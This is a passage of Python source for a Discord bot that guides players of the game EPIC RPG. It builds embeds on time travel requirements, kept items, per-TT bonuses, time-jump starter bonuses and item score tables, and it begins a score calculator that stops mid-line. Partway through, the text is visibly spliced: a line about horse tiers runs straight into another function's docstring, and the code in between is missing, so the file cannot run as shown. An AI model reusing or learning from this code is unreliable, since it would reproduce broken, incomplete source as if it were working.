profile_data['enchant_armor'] = 'OMEGA'\n\n    embed = await embed_time_jump_calculator(area_no, inventory.lower(), profile_data, boosts_data, option_inventory,\n                                             option_stats)\n    if option_stats == STATS_MANUAL:\n        view = views.TimeJumpCalculatorView(ctx, area_no, inventory.lower(), profile_data, boosts_data, option_inventory,\n                                            option_stats, all_items, embed_time_jump_calculator)\n        interaction = await ctx.respond(embed=embed, view=view)\n        view.interaction = interaction\n        await view.wait()\n    else:\n        await ctx.respond(embed=embed)\n\n\n# --- Embeds ---\nasync def embed_time_travel() -> discord.Embed:\n    \"\"\"Time travel 
overview\"\"\"\n where = (\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 0: Beat dungeon 10, reach area 11\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 1-2: Beat dungeon 11, reach area 12\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 3-4: Beat dungeon 12, reach area 13\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 5-9: Beat dungeon 13, reach area 14\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 10-24: Beat dungeon 14, reach area 15\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 25+: Beat dungeon 15-1\\n'\n )\n keptitems = (\n f'{emojis.BP} Active boosts\\n'\n f'{emojis.BP} Arena cookies\\n'\n f'{emojis.BP} Coins (this includes your bank account)\\n'\n f'{emojis.BP} Dragon essences\\n'\n f'{emojis.BP} EPIC berries\\n'\n f'{emojis.BP} EPIC coins\\n'\n f'{emojis.BP} EPIC shop items\\n'\n f'{emojis.BP} Event items (if an event is active)\\n'\n f'{emojis.BP} GODLY horse tokens\\n'\n f'{emojis.BP} Guild rings\\n'\n f'{emojis.BP} Legendary toothbrushes\\n'\n f'{emojis.BP} Magic chairs\\n'\n f'{emojis.BP} Profession levels\\n'\n f'{emojis.BP} OMEGA horse tokens\\n'\n f'{emojis.BP} Party poppers\\n'\n f'{emojis.BP} TIME capsules\\n'\n f'{emojis.BP} TIME cookies\\n'\n f'{emojis.BP} TIME dragon essences\\n'\n f'{emojis.BP} Your guild\\n'\n f'{emojis.BP} Your horse\\n'\n f'{emojis.BP} Your marriage partner\\n'\n f'{emojis.BP} Your pets\\n'\n )\n boosts = (\n f'{emojis.BP} {emojis.POTION_TIME} TIME potion: Keep `7.5`% of the items in your inventory\\n'\n )\n embed = discord.Embed(\n color = settings.EMBED_COLOR,\n title = 'TIME TRAVEL (TT)',\n description = (\n f'Resets your character to level 1 / area 1 but unlocks new game features and increases XP and drop chances.\\n'\n f'To time travel, use {strings.SLASH_COMMANDS_EPIC_RPG[\"time travel\"]} while meeting the requirements.\\n'\n f'Warning: **You will lose everything except the items mentioned below**. So make sure you have done all '\n f'you want to do. 
You can check what you should do before time traveling by looking up the TT you are '\n f'going to travel to with {strings.SLASH_COMMANDS_GUIDE[\"time travel bonuses\"]}.'\n )\n\n )\n embed.add_field(name='REQUIREMENTS FOR TIME TRAVEL', value=where, inline=False)\n embed.add_field(name='WHAT YOU KEEP', value=keptitems, inline=False)\n embed.add_field(name='POTIONS THAT AFFECT TIME TRAVEL', value=boosts, inline=False)\n return embed\n\n\nasync def embed_time_travel_bonuses(tt: database.TimeTravel, mytt: bool = False):\n \"\"\"Embed with details for specific time travel\"\"\"\n bonus_xp = (99 + tt.tt) * tt.tt / 2\n bonus_duel_xp = (99 + tt.tt) * tt.tt / 4\n bonus_drop_chance = (49 + tt.tt) * tt.tt / 2\n berry_drop_chance = bonus_drop_chance / 10\n #artifacts_drop_chance = bonus_drop_chance / 4\n dynamite_rubies = 1 + (bonus_drop_chance / 100)\n crops_normal_min = dynamite_rubies * 2\n crops_normal_max = dynamite_rubies * 3\n crops_special_min = dynamite_rubies * 5\n crops_special_med = dynamite_rubies * 6\n crops_special_max = dynamite_rubies * 7\n greenhouse_watermelon_min = dynamite_rubies * 2\n greenhouse_watermelon_max = dynamite_rubies * 3\n chainsaw_mega = dynamite_rubies * 2\n bigboat_superfish = ceil(0.85 * dynamite_rubies)\n chainsaw_ultimate = dynamite_rubies / 3.5\n dynamite_rubies = Decimal(dynamite_rubies).quantize(Decimal('1'), rounding=ROUND_HALF_UP)\n #greenhouse_watermelon_min = Decimal(greenhouse_watermelon_min).quantize(Decimal('1'), rounding=ROUND_HALF_UP)\n #greenhouse_watermelon_max = Decimal(greenhouse_watermelon_max).quantize(Decimal('1'), rounding=ROUND_HALF_UP)\n chainsaw_ultimate = Decimal(chainsaw_ultimate).quantize(Decimal('1'), rounding=ROUND_HALF_UP)\n rubies = int(dynamite_rubies)\n crops_normal_min = int(crops_normal_min)\n crops_normal_max = int(crops_normal_max)\n crops_special_min = int(crops_special_min)\n crops_special_med = int(crops_special_med)\n crops_special_max = int(crops_special_max)\n watermelon_min = int(greenhouse_watermelon_min)\n watermelon_max = int(greenhouse_watermelon_max)\n super_fish = int(bigboat_superfish)\n mega_log = int(chainsaw_mega)\n ultimate_logs = int(chainsaw_ultimate)\n if ultimate_logs <= 0: ultimate_logs = 1\n if super_fish <= 0: super_fish = 1\n # Enchant multiplier formula is from a player, tested up to TT120 + 194 + 200. 
TT15 only one found to be wrong so far.\n tt_enchant_multipliers = {\n 15: 6,\n }\n if tt.tt in tt_enchant_multipliers:\n enchant_multiplier = tt_enchant_multipliers[tt.tt]\n else:\n enchant_multiplier = round((tt.tt ** 2 / 64) + (7 * tt.tt / 73) + (19 / 35))\n bonus_xp = f'{bonus_xp:,.1f}'.replace('.0','')\n bonus_duel_xp = f'{bonus_duel_xp:,.1f}'.replace('.0','')\n bonus_drop_chance = f'{bonus_drop_chance:,.1f}'.replace('.0','')\n berry_drop_chance = f'{berry_drop_chance:,.1f}'.replace('.0','')\n #artifacts_drop_chance = f'{artifacts_drop_chance:,g}'\n if mytt:\n embed_description = (\n f'This is your current TT according to your settings.\\n'\n f'If this is wrong, use {strings.SLASH_COMMANDS_GUIDE[\"set progress\"]} to change it.'\n )\n else:\n embed_description = 'Allons-y !'\n unlocks = ''\n if tt.unlock_misc is not None:\n unlocks = f'{emojis.BP} Unlocks **{tt.unlock_misc}**\\n'\n if tt.unlock_dungeon is not None:\n unlocks = f'{unlocks}{emojis.BP} Unlocks **dungeon {tt.unlock_dungeon}**\\n'\n if tt.unlock_area is not None:\n unlocks = f'{unlocks}{emojis.BP} Unlocks **area {tt.unlock_area}**\\n'\n if tt.unlock_enchant is not None:\n unlocks = f'{unlocks}{emojis.BP} Unlocks the **{tt.unlock_enchant}** enchant\\n'\n if tt.unlock_title is not None:\n unlocks = f'{unlocks}{emojis.BP} Unlocks the title **{tt.unlock_title}**\\n'\n unlocks = (\n f\"{unlocks}{emojis.BP} `{bonus_xp}` % increased **XP** from everything except duels\\n\"\n f'{emojis.BP} `{bonus_duel_xp}` % increased **XP** from **duels**\\n'\n f'{emojis.BP} `{bonus_drop_chance}` % extra chance to get **monster drops**\\n'\n f'{emojis.BP} `{bonus_drop_chance}` % more **items** with work commands\\n'\n f'{emojis.BP} `{berry_drop_chance}` % more **EPIC berries** with pickup commands\\n'\n #f'{emojis.BP} `{artifacts_drop_chance}` % extra chance to find **artifact parts**\\n'\n f'{emojis.BP} `x{enchant_multiplier:,}` enchanting multiplier (_approximation formula_)\\n'\n )\n if tt.tt > 1:\n unlocks = (\n f'{unlocks.strip()}\\n'\n f'{emojis.BP} `{tt.tt + 5:,}` base pet slots\\n'\n f'{emojis.DETAIL} Your total pet slots depend on the coolness pet slot multiplier\\n'\n f'{emojis.DETAIL} See {strings.SLASH_COMMANDS_EPIC_RPG[\"ultraining progress\"]} to see your multiplier\\n'\n )\n if tt.tt > 0:\n unlocks = (\n f'{unlocks.strip()}\\n'\n f'{emojis.BP} Higher chance to get `+1` tier in {strings.SLASH_COMMANDS_EPIC_RPG[\"horse breeding\"]} and '\n f'{strings.SLASH_COMMANDS_EPIC_RPG[\"pets fusion\"]} (chance unknown)\\n'\n )\n coin_cap = f'`{pow(tt.tt, 4) * 500_000_000:,}`' if tt.tt > 0 else '`100,000` - `14,400,000`'\n field_coin_cap = (\n f'{emojis.BP} ~{coin_cap} {emojis.COIN} coins\\n'\n f'{emojis.BP} Use {strings.SLASH_COMMANDS_GUIDE[\"coin cap calculator\"]} to see your exact cap\\n'\n )\n work_multiplier = (\n f'{emojis.BP} `{crops_special_min:,}`, `{crops_special_med:,}` or `{crops_special_max:,}` {emojis.BREAD}'\n f'{emojis.CARROT}{emojis.POTATO} with {strings.SLASH_COMMANDS_EPIC_RPG[\"farm\"]} from special seeds\\n'\n f'{emojis.BP} `{crops_normal_min:,}` or `{crops_normal_max:,}` {emojis.BREAD}'\n f'{emojis.CARROT}{emojis.POTATO} with {strings.SLASH_COMMANDS_EPIC_RPG[\"farm\"]} from normal seeds\\n'\n f'{emojis.BP} ~`{watermelon_min:,}` - `{watermelon_max:,}` {emojis.WATERMELON} with '\n f'{strings.SLASH_COMMANDS_EPIC_RPG[\"greenhouse\"]}\\n'\n f'{emojis.BP} `{mega_log:,}` {emojis.LOG_MEGA} with {strings.SLASH_COMMANDS_EPIC_RPG[\"chainsaw\"]}\\n'\n f'{emojis.BP} `{rubies:,}` {emojis.RUBY} with 
{strings.SLASH_COMMANDS_EPIC_RPG[\"dynamite\"]}\\n'\n f'{emojis.BP} `{rubies:,}` {emojis.LOG_HYPER} / {emojis.LOG_ULTRA} with {strings.SLASH_COMMANDS_EPIC_RPG[\"chainsaw\"]}\\n'\n f'{emojis.BP} ~`{super_fish:,}` {emojis.FISH_SUPER} with {strings.SLASH_COMMANDS_EPIC_RPG[\"bigboat\"]}\\n'\n f'{emojis.BP} ~`{ultimate_logs:,}` {emojis.LOG_ULTIMATE} with {strings.SLASH_COMMANDS_EPIC_RPG[\"chainsaw\"]}\\n'\n )\n prep_tt1_to_2 = (\n f'{emojis.BP} If your horse is T6+: Get 30m coins\\n'\n f'{emojis.BP} If your horse is discord.Embed:\n \"\"\"Super timetravel guide\"\"\"\n requirements = (\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 25+\\n'\n f'{emojis.BP} {emojis.TIME_KEY} TIME key (drops from the boss in dungeon 15-1)'\n )\n starter_bonuses = (\n f'{emojis.BP} Start with +25 LIFE (50 score)\\n'\n f'{emojis.BP} Start with a new Tier I pet (300 score)\\n'\n f'{emojis.BP} Start with +50 AT (400 score)\\n'\n f'{emojis.BP} Start with +50 DEF (400 score)\\n'\n f'{emojis.BP} Start with 35 of each monster drop (400 score)\\n'\n f'{emojis.BP} Start with an OMEGA lootbox (500 score)\\n'\n f'{emojis.BP} Start with a new Tier III pet (1,500 score)\\n'\n f'{emojis.BP} Start with 10 ULTRA logs (1,750 score)\\n'\n f'{emojis.BP} Start in area 2 (2,000 score)\\n'\n f'{emojis.BP} Start with a new Tier I pet with 1 skill (4,500 score)\\n'\n f'{emojis.BP} Start in area 3 (4,500 score)\\n'\n f'{emojis.BP} Start with a GODLY lootbox (6,500 score)'\n )\n embed = discord.Embed(\n color = settings.EMBED_COLOR,\n title = 'TIME JUMP / SUPER TIME TRAVEL (STT)',\n description = (\n f'Time jumping is unlocked once you reach {emojis.TIME_TRAVEL} TT 25. From this point onward you have '\n f'to use {strings.SLASH_COMMANDS_EPIC_RPG[\"time jump\"]} to reach the next TT.\\n'\n f'Time jump lets you choose a starter bonus. 
You can (and have to) choose **1** bonus.\\n'\n f'These bonuses cost score points which are calculated based on your inventory and your gear '\n f'(see {strings.SLASH_COMMANDS_GUIDE[\"time jump score\"]}).\\n'\n )\n\n )\n embed.add_field(name='REQUIREMENTS', value=requirements, inline=False)\n embed.add_field(name='STARTER BONUSES', value=starter_bonuses, inline=False)\n return embed\n\n\nasync def embed_time_jump_score_stats() -> discord.Embed:\n \"\"\"STT score stats & enchants embed\"\"\"\n base = (\n f'{emojis.BP} You have a base score of 8, regardless of anything else'\n )\n level = (\n f'{emojis.BP} 1 level without stats = 0.5 score\\n'\n f'{emojis.BP} 1 level including its stats = 0.9 score\\n'\n )\n stats = (\n f'{emojis.BP} 1 {emojis.STAT_AT} AT = 0.125 score\\n'\n f'{emojis.BP} 1 {emojis.STAT_DEF} DEF = 0.15 score\\n'\n f'{emojis.BP} 1 {emojis.STAT_LIFE} HP = 0.025 score\\n'\n f'{emojis.DETAIL} Only **base** stats give score!\\n'\n f'{emojis.DETAIL} This includes stats from level, food, boosts and gear\\n'\n )\n enchants = (\n f'{emojis.BP} Enchants have a score that is 4x their bonus / 100\\n'\n f'{emojis.DETAIL} Example: OMEGA enchant is `125 * 4 / 100` = 5 score\\n'\n )\n calculation = (\n f'{emojis.BP} Add stats and level scores and ceil\\n'\n f'{emojis.BP} Add both enchant scores and ceil\\n'\n )\n calculator = (\n f'{emojis.BP} Use {strings.SLASH_COMMANDS_GUIDE[\"time jump calculator\"]} to calculate your score'\n )\n embed = discord.Embed(\n color = settings.EMBED_COLOR,\n title = 'TIME JUMP SCORE • STATS & ENCHANTS',\n )\n embed.add_field(name='BASE SCORE', value=base, inline=False)\n embed.add_field(name='LEVEL', value=level, inline=False)\n embed.add_field(name='STATS', value=stats, inline=False)\n embed.add_field(name='ENCHANTS', value=enchants, inline=False)\n embed.add_field(name='HOW TO CALCULATE', value=calculation, inline=False)\n embed.add_field(name='CALCULATOR', value=calculator, inline=False)\n return embed\n\n\nasync def embed_time_jump_score_materials() -> discord.Embed:\n \"\"\"STT score materials embed\"\"\"\n lootboxes = (\n f'{emojis.BP} 1 {emojis.LB_COMMON} common lootbox = 0.05 score\\n'\n f'{emojis.BP} 1 {emojis.LB_UNCOMMON} uncommon lootbox = 0.1 score\\n'\n f'{emojis.BP} 1 {emojis.LB_RARE} rare lootbox = 0.133... 
score\\n'\n f'{emojis.BP} 1 {emojis.LB_EPIC} EPIC lootbox = 0.2 score\\n'\n f'{emojis.BP} 1 {emojis.LB_EDGY} EDGY lootbox = 0.25 score\\n'\n f'{emojis.BP} 1 {emojis.LB_OMEGA} OMEGA lootbox = 5 score\\n'\n f'{emojis.BP} 1 {emojis.LB_GODLY} GODLY lootbox = 50 score\\n'\n f'{emojis.BP} 1 {emojis.LB_VOID} VOID lootbox = 200 score\\n'\n )\n farm_items = (\n f'{emojis.BP} 35 {emojis.POTATO} potatoes = 1 score\\n'\n f'{emojis.BP} 30 {emojis.CARROT} carrots = 1 score\\n'\n f'{emojis.BP} 25 {emojis.BREAD} bread = 1 score (best value)\\n'\n f'{emojis.BP} 1 {emojis.SEED_POTATO} potato seed = 1 score\\n'\n f'{emojis.BP} 1 {emojis.SEED_CARROT} carrot seed = 1 score\\n'\n f'{emojis.BP} 1 {emojis.SEED_BREAD} bread seed = 1 score\\n'\n f'{emojis.BP} 2,500 {emojis.SEED} seed = 1 score (10k seeds max)\\n'\n )\n mob_drops = (\n f'{emojis.BP} 20 {emojis.WOLF_SKIN} wolf skins = 1 score\\n'\n f'{emojis.BP} 20 {emojis.ZOMBIE_EYE} zombie eyes = 2 score\\n'\n f'{emojis.BP} 20 {emojis.UNICORN_HORN} unicorn horns = 3 score\\n'\n f'{emojis.BP} 20 {emojis.MERMAID_HAIR} mermaid hairs = 4 score\\n'\n f'{emojis.BP} 20 {emojis.CHIP} chips = 5 score\\n'\n f'{emojis.BP} 20 {emojis.DRAGON_SCALE} dragon scales = 10 score\\n'\n f'{emojis.BP} 20 {emojis.DARK_ENERGY} dark energy = 15 score\\n'\n )\n rubies = (\n f'{emojis.BP} 25 {emojis.RUBY} rubies = 1 score\\n'\n )\n logs = (\n f'{emojis.BP} 25,000 {emojis.LOG} wooden logs = 1 score\\n'\n f'{emojis.BP} 2,500 {emojis.LOG_EPIC} EPIC logs = 1 score\\n'\n f'{emojis.BP} 250 {emojis.LOG_SUPER} SUPER logs = 1 score\\n'\n f'{emojis.BP} 25 {emojis.LOG_MEGA} MEGA logs = 1 score\\n'\n f'{emojis.BP} 2.5 {emojis.LOG_HYPER} HYPER log = 1 score\\n'\n f'{emojis.BP} 1 {emojis.LOG_ULTRA} ULTRA log = 4 score\\n'\n f'{emojis.BP} 1 {emojis.LOG_ULTIMATE} ULTIMATE log = 40 score\\n'\n )\n fish = (\n f'{emojis.BP} 25,000 {emojis.FISH} normie fish = 1 score\\n'\n f'{emojis.BP} 1,250 {emojis.FISH_GOLDEN} golden fish = 1 score\\n'\n f'{emojis.BP} 12.5 {emojis.FISH_EPIC} EPIC fish = 1 score\\n'\n f'{emojis.BP} 1 {emojis.FISH_SUPER} SUPER fish = 8 score\\n'\n )\n fruit = (\n f'{emojis.BP} 5,000 {emojis.APPLE} apples = 1 score\\n'\n f'{emojis.BP} 250 {emojis.BANANA} bananas = 1 score\\n'\n f'{emojis.BP} 12 {emojis.WATERMELON} watermelons = 1 score\\n'\n )\n other = (\n f'{emojis.BP} 500,000 {emojis.LIFE_POTION} life potions = 1 score (1m potions max)\\n'\n f'{emojis.BP} 2 {emojis.LOTTERY_TICKET} lottery tickets = 1 score (200 tickets max)\\n'\n )\n calculation = (\n f'{emojis.BP} Add lootbox and farm item scores and floor\\n'\n f'{emojis.BP} Add mob drop scores and floor\\n'\n f'{emojis.BP} Ceil life potion score\\n'\n f'{emojis.BP} Ceil lottery ticket score\\n'\n f'{emojis.BP} Add all other material scores and floor\\n'\n )\n calculator = (\n f'{emojis.BP} Use {strings.SLASH_COMMANDS_GUIDE[\"time jump calculator\"]} to calculate your score'\n )\n embed = discord.Embed(\n color = settings.EMBED_COLOR,\n title = 'TIME JUMP SCORE • MATERIALS',\n )\n embed.add_field(name='LOOTBOXES', value=lootboxes, inline=False)\n embed.add_field(name='FARM ITEMS', value=farm_items, inline=False)\n embed.add_field(name='MOB DROPS', value=mob_drops, inline=False)\n embed.add_field(name='RUBIES', value=rubies, inline=False)\n embed.add_field(name='LOGS', value=logs, inline=False)\n embed.add_field(name='FISH', value=fish, inline=False)\n embed.add_field(name='FRUIT', value=fruit, inline=False)\n embed.add_field(name='OTHER MATERIALS', value=other, inline=False)\n embed.add_field(name='HOW TO CALCULATE', value=calculation, 
inline=False)\n embed.add_field(name='CALCULATOR', value=calculator, inline=False)\n return embed\n\n\nasync def embed_time_jump_score_gear() -> discord.Embed:\n \"\"\"STT score gear embed\"\"\"\n gear_basic = (\n f'{emojis.BP} {emojis.SWORD_BASIC} Basic Sword = 0.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_BASIC} Basic Armor = 0.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_WOODEN} Wooden Sword = 1 score\\n'\n f'{emojis.BP} {emojis.ARMOR_FISH} Fish Armor = 1 score\\n'\n f'{emojis.BP} {emojis.SWORD_FISH} Fish Sword = 1.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_WOLF} Wolf Armor = 1.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_APPLE} Apple Sword = 2 score\\n'\n f'{emojis.BP} {emojis.ARMOR_EYE} Eye Armor = 2 score\\n'\n f'{emojis.BP} {emojis.SWORD_ZOMBIE} Zombie Sword = 2.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_BANANA} Banana Armor = 2.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_RUBY} Ruby Sword = 3 score\\n'\n f'{emojis.BP} {emojis.ARMOR_EPIC} Epic Armor = 3 score\\n'\n )\n gear_advanced = (\n f'{emojis.BP} {emojis.SWORD_UNICORN} Unicorn Sword = 3.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_RUBY} Ruby Armor = 3.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_HAIR} Hair Sword = 4 score\\n'\n f'{emojis.BP} {emojis.ARMOR_COIN} Coin Armor = 4 score\\n'\n f'{emojis.BP} {emojis.SWORD_COIN} Coin Sword = 4.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_MERMAID} Mermaid Armor = 4.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_ELECTRONICAL} Electronical Sword = 5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_ELECTRONICAL} Electronical Armor = 5 score\\n'\n f'{emojis.BP} {emojis.SWORD_EDGY} EDGY Sword = 5.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_EDGY} EDGY Armor = 5.5 score\\n'\n )\n gear_forged = (\n f'{emojis.BP} {emojis.SWORD_ULTRAEDGY} ULTRA-EDGY Sword = 6 score\\n'\n f'{emojis.BP} {emojis.ARMOR_ULTRAEDGY} ULTRA-EDGY Armor = 6 score\\n'\n f'{emojis.BP} {emojis.SWORD_OMEGA} OMEGA Sword = 6.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_OMEGA} OMEGA Armor = 6.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_ULTRAOMEGA} ULTRA-OMEGA Sword = 7 score\\n'\n f'{emojis.BP} {emojis.ARMOR_ULTRAOMEGA} ULTRA-OMEGA Armor = 7 score\\n'\n f'{emojis.BP} {emojis.SWORD_GODLY} GODLY Sword = 7.5 score\\n'\n )\n gear_tryhard = (\n f'{emojis.BP} {emojis.SWORD_BANANA} Banana Sword = 8 score\\n'\n f'{emojis.BP} {emojis.ARMOR_SCALED} Scaled Armor = 8 score\\n'\n f'{emojis.BP} {emojis.SWORD_SCALED} Scaled Sword = 8.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_WATERMELON} Watermelon Armor = 8.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_WATERMELON} Watermelon Sword = 9 score\\n'\n f'{emojis.BP} {emojis.ARMOR_SUPER} Super Armor = 9 score\\n'\n f'{emojis.BP} {emojis.SWORD_EPIC} Epic Sword = 9.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_LOOTBOX} Lootbox Armor = 9.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_LOTTERY} Lottery Sword = 10 score\\n'\n f'{emojis.BP} {emojis.ARMOR_WOODEN} Wooden Armor = 10 score\\n'\n )\n gear_void = (\n f'{emojis.BP} {emojis.SWORD_VOID} VOID Sword = 10.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_VOID} VOID Armor = 10.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_ABYSS} ABYSS Sword = 11 score\\n'\n f'{emojis.BP} {emojis.ARMOR_ABYSS} ABYSS Armor = 11 score\\n'\n f'{emojis.BP} {emojis.SWORD_CORRUPTED} CORRUPTED Sword = 11.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_CORRUPTED} CORRUPTED Armor = 11.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_SPACE} SPACE Sword = 12 score\\n'\n f'{emojis.BP} {emojis.ARMOR_SPACE} SPACE Armor = 12 score\\n'\n f'{emojis.BP} {emojis.SWORD_TIME} TIME Sword = 12.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_TIME} TIME Armor = 12.5 score\\n'\n )\n 
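The stats, materials, and gear embeds above spell out one complete rounding scheme (a flat base of 8, ceiled stats and enchants, floored material buckets, unrounded gear). A minimal sketch pulling those rules into a single function; the function name and every sample number below are mine, not from the guide:

```python
from math import ceil, floor

def time_jump_score(level, base_at, base_def, base_life,
                    sword_enchant_pct, armor_enchant_pct,
                    lootbox_farm_score, mob_drop_score, material_score,
                    gear_score, life_potions, lottery_tickets):
    score = 8                                  # flat base score
    stats = (level * 0.5 + base_at * 0.125
             + base_def * 0.15 + base_life * 0.025)
    enchants = (sword_enchant_pct + armor_enchant_pct) * 4 / 100
    score += ceil(stats) + ceil(enchants)      # stats and enchants are ceiled
    score += floor(lootbox_farm_score)         # lootboxes + farm items share one floor
    score += floor(mob_drop_score)             # mob drops are floored separately
    score += floor(material_score)             # remaining materials share one floor
    score += gear_score                        # gear scores stay unrounded
    score += ceil(life_potions / 500_000)      # life potions and lottery
    score += ceil(lottery_tickets / 2)         # tickets are each ceiled
    return score

# Level 100, base 150 AT / 160 DEF / 595 HP, two OMEGA enchants (125% each):
print(time_jump_score(100, 150, 160, 595, 125, 125,
                      12.3, 4.2, 7.9, 13.0, 600_000, 10))  # -> 169.0
```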
calculation = (\n        f'{emojis.BP} Both scores are added and **not** rounded\\n'\n    )\n    note = (\n        f'{emojis.BP} These scores do **not** include AT and DEF of the gear!\\n'\n        f'{emojis.DETAIL} Stats are calculated separately by the game\\n'\n        f'{emojis.DETAIL} See topic `Stats & enchants` for details\\n'\n        f'{emojis.BP} Gear not listed here doesn\\'t have a known value yet\\n'\n    )\n    calculator = (\n        f'{emojis.BP} Use {strings.SLASH_COMMANDS_GUIDE["time jump calculator"]} to calculate your score'\n    )\n    embed = discord.Embed(\n        color = settings.EMBED_COLOR,\n        title = 'TIME JUMP SCORE • GEAR',\n    )\n    embed.add_field(name='BASIC GEAR', value=gear_basic, inline=False)\n    embed.add_field(name='ADVANCED GEAR', value=gear_advanced, inline=False)\n    embed.add_field(name='FORGED GEAR', value=gear_forged, inline=False)\n    embed.add_field(name='TRYHARD GEAR', value=gear_tryhard, inline=False)\n    embed.add_field(name='VOID GEAR', value=gear_void, inline=False)\n    embed.add_field(name='HOW TO CALCULATE', value=calculation, inline=False)\n    embed.add_field(name='NOTE', value=note, inline=False)\n    embed.add_field(name='CALCULATOR', value=calculator, inline=False)\n    return embed\n\n\nasync def embed_time_jump_calculator(area_no: int, inventory: str, profile_data: dict, boosts_data: dict,\n                                     option_inventory: str, option_stats: str) -> discord.Embed:\n    \"\"\"STT score calculator embed\"\"\"\n    message_area = 'The TOP' if area_no == 21 else f'area {area_no}'\n    if option_inventory == INVENTORY_CURRENT:\n        calculated_area = message_area\n    elif option_inventory == INVENTORY_TRADE_A15:\n        calculated_area = 'area 15'\n    else:\n        calculated_area = 'areas 16+'\n    inventory = inventory.lower()\n    fish = await functions.inventory_get(inventory, 'normie fish')\n    fishgolden = await functions.inventory_get(inventory, 'golden fish')\n    fishepic = await functions.inventory_get(inventory, 'epic fish')\n    fishsuper = await functions.inventory_get(inventory, 'super fish')\n    log = await functions.inventory_get(inventory, 'wooden log')\n    logepic = await functions.inventory_get(inventory, 'epic log')\n    logsuper = await functions.inventory_get(inventory, 'super log')\n    logmega = await functions.inventory_get(inventory, 'mega log')\n    loghyper = await functions.inventory_get(inventory, 'hyper log')\n    logultra = await functions.inventory_get(inventory, 'ultra log')\n    logultimate = await functions.inventory_get(inventory, 'ultimate log')\n    apple = await functions.inventory_get(inventory, 'apple')\n    banana = await functions.inventory_get(inventory, 'banana')\n    watermelon = await functions.inventory_get(inventory, 'watermelon')\n    ruby = await functions.inventory_get(inventory, 'ruby')\n    wolfskin = await functions.inventory_get(inventory, 'wolf skin')\n    zombieeye = await functions.inventory_get(inventory, 'zombie eye')\n    unicornhorn = await functions.inventory_get(inventory, 'unicorn horn')\n    mermaidhair = await functions.inventory_get(inventory, 'mermaid hair')\n    chip = await functions.inventory_get(inventory, 'chip')\n    dragonscale = await functions.inventory_get(inventory, 'dragon scale')\n    darkenergy = await functions.inventory_get(inventory, 'dark energy')\n    lbcommon = await functions.inventory_get(inventory, 'common lootbox')\n    lbuncommon = await functions.inventory_get(inventory, 'uncommon lootbox')\n    lbrare = await functions.inventory_get(inventory, 'rare lootbox')\n    lbepic = await functions.inventory_get(inventory, 'epic lootbox')\n    lbedgy = await functions.inventory_get(inventory, 'edgy lootbox')\n    lbomega = await 
functions.inventory_get(inventory, 'omega lootbox')\n lbgodly = await functions.inventory_get(inventory, 'godly lootbox')\n lbvoid = await functions.inventory_get(inventory, 'void lootbox')\n lifepotion = await functions.inventory_get(inventory, 'life potion')\n potato = await functions.inventory_get(inventory, 'potato')\n carrot = await functions.inventory_get(inventory, 'carrot')\n bread = await functions.inventory_get(inventory, 'bread')\n seed = await functions.inventory_get(inventory, 'seed')\n seed_bread = await functions.inventory_get(inventory, 'bread seed')\n seed_carrot = await functions.inventory_get(inventory, 'carrot seed')\n seed_potato = await functions.inventory_get(inventory, 'potato seed')\n lottery_ticket = await functions.inventory_get(inventory, 'lottery ticket')\n\n score_lbcommon = lbcommon * 0.05\n score_lbuncommon = lbuncommon * 0.1\n score_lbrare = lbrare * (0.4 / 3)\n score_lbepic = lbepic * 0.2\n score_lbedgy = lbedgy * 0.25\n score_lbomega = lbomega * 5\n score_lbgodly = lbgodly * 50\n score_lbvoid = lbvoid * 200\n score_lootboxes = (\n score_lbcommon + score_lbuncommon + score_lbrare + score_lbepic + score_lbedgy + score_lbomega + score_lbgodly\n + score_lbvoid\n )\n score_bread = bread / 25\n score_carrot = carrot / 30\n score_potato = potato / 35\n score_seed = seed / 2500\n score_seed_bread = seed_bread\n score_seed_carrot = seed_carrot\n score_seed_potato = seed_potato\n score_farm_items = (\n score_bread + score_carrot + score_potato + score_seed + score_seed_bread + score_seed_potato + score_seed_carrot\n )\n score_total_lootboxes_farm_items = score_lootboxes + score_farm_items\n score_wolfskin = wolfskin / 20\n score_zombieeye = zombieeye / 10\n score_unicornhorn = unicornhorn / (20 / 3)\n score_mermaidhair = mermaidhair / 5\n score_chip = chip / 4\n score_dragonscale = dragonscale / 2\n score_darkenergy = darkenergy * 0.75\n score_total_mobdrops = (\n score_wolfskin + score_zombieeye + score_unicornhorn + score_mermaidhair + score_chip + score_dragonscale\n + score_darkenergy\n )\n score_logultimate = logultimate * 40\n score_fishsuper = fishsuper * 8\n score_watermelon = watermelon / 12\n score_lifepotion = lifepotion / 500_000\n score_lottery = lottery_ticket / 2\n score_total_other = score_lottery + score_lifepotion\n score_total = floor(score_total_lootboxes_farm_items) + floor(score_total_mobdrops) + ceil(score_lottery) + ceil(score_lifepotion)\n\n field_lootboxes = (\n f'{emojis.BP} {lbcommon:,} {emojis.LB_COMMON} = {score_lbcommon:,.2f}\\n'\n f'{emojis.BP} {lbuncommon:,} {emojis.LB_UNCOMMON} = {score_lbuncommon:,.2f}\\n'\n f'{emojis.BP} 